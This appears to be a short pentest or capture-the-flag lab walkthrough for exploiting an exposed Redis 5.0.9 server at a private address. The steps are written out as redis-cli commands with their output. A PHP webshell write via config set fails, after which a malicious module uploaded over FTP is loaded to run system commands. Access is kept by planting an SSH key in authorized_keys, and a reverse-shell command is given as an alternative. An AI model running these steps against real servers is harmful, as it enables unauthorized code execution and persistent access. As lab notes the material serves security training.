4 :6379 redis
redis-cli -h 192.168.224.93
192.168.224.93:6379> info server
# Server
redis_version:5.0.9
os:Linux 3.10.0-1127.19.1.el7.x86_64 x86_64
arch_bits:64
gcc_version:4.8.5
executable:/usr/local/bin/redis-server
config_file:/etc/redis/redis.conf
Using https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#webshell
# we can set config dir to /var/www/html
but we cannot write there.
192.168.224.93:6379> config set dir /var/www/html/
OK
192.168.224.93:6379> config set dbfilename redis.php
OK
192.168.224.93:6379> set test "<?php phpinfo(); ?>"
OK
192.168.224.93:6379> save
(error) ERR
Using https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#load-redis-module
# clone repo, make
# need to upload the module.so
# we can use ftp to upload
Uploaded module.so on ftp pub/
Default path is /var/ftp
Using redis-cli
192.168.224.93:6379> module load /var/ftp/pub/module.so
192.168.224.93:6379> modue list
(error) ERR unknown command `modue`, with args beginning with: `list`,
192.168.224.93:6379> module list
1) 1) "name"
2) "system"
3) "ver"
4) (integer) 1
192.168.224.93:6379> system.exec "whoami;id;hostname;uname -a"
"pablo\nuid=1000(pablo) gid=1000(pablo) groups=1000(pablo)\nsybaris\nLinux sybaris 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\n"
192.168.224.93:6379>
192.168.224.93:6379> system.exec "mkdir /home/pablo/.ssh"
192.168.224.93:6379> system.exec 'echo "ssh-rsa <<id_rsa.pub>> > /home/pablo/.ssh/authorized_keys'
[OR]
192.168.224.93:6379> system.rev IP PORT
Last updated